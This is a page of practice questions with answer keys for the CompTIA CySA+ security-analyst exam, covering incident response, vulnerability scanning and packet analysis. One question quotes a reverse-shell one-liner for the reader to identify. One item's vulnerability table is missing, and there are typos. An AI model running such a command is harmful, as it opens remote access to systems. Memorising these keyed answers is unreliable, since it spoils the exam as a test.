CompTIA CySA+ (CS0-003) v1.0

Page:    1 / 23   
Exam contains 331 questions

When starting an investigation, which of the following must be done first?

  • A. Notify law enforcement
  • B. Secure the scene
  • C. Seize all related evidence
  • D. Interview the witnesses


Answer : B

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

  • A. The lead should review what is documented in the incident response policy or plan
  • B. Management level members of the CSIRT should make that decision
  • C. The lead has the authority to decide who to communicate with at any t me
  • D. Subject matter experts on the team should communicate with others within the specified area of expertise


Answer : A

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

  • A. Firewall logs
  • B. Indicators of compromise
  • C. Risk assessment
  • D. Access control lists


Answer : C

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

  • A. Beaconing
  • B. Cross-site scripting
  • C. Buffer overflow
  • D. PHP traversal


Answer : A

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

  • A. Change the display filter to ftp.active.port
  • B. Change the display filter to tcp.port==20
  • C. Change the display filter to ftp-data and follow the TCP streams
  • D. Navigate to the File menu and select FTP from the Export objects option


Answer : C

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

  • A. SLA
  • B. MOU
  • C. NDA
  • D. Limitation of liability


Answer : A

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

  • A. Command and control
  • B. Actions on objectives
  • C. Exploitation
  • D. Delivery


Answer : A

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

  • A. External
  • B. Agent-based
  • C. Non-credentialed
  • D. Credentialed


Answer : B

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

  • A. RCE
  • B. Reverse shell
  • C. XSS
  • D. SQL injection


Answer : B

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

  • A. Scope
  • B. Weaponization
  • C. CVSS
  • D. Asset value


Answer : B

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

  • A. 10.101.27.98
  • B. 54.73.225.17
  • C. 54.74.110.26
  • D. 54.74.110.228


Answer : D

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

  • A. Credentialed network scanning
  • B. Passive scanning
  • C. Agent-based scanning
  • D. Dynamic scanning


Answer : C

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

  • A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
  • B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
  • C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
  • D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }


Answer : D

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

  • A. Implement step-up authentication for administrators
  • B. Improve employee training and awareness
  • C. Increase password complexity standards
  • D. Deploy mobile device management


Answer : B

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

  • A. Determine the sophistication of the audience that the report is meant for
  • B. Include references and sources of information on the first page
  • C. Include a table of contents outlining the entire report
  • D. Decide on the color scheme that will effectively communicate the metrics


Answer : A

Page:    1 / 23   
Exam contains 331 questions

Talk to us!


Have any questions or issues ? Please dont hesitate to contact us

Certlibrary.com is owned by MBS Tech Limited: Room 1905 Nam Wo Hong Building, 148 Wing Lok Street, Sheung Wan, Hong Kong. Company registration number: 2310926
Certlibrary doesn't offer Real Microsoft Exam Questions. Certlibrary Materials do not contain actual questions and answers from Cisco's Certification Exams.
CFA Institute does not endorse, promote or warrant the accuracy or quality of Certlibrary. CFA® and Chartered Financial Analyst® are registered trademarks owned by CFA Institute.
Terms & Conditions | Privacy Policy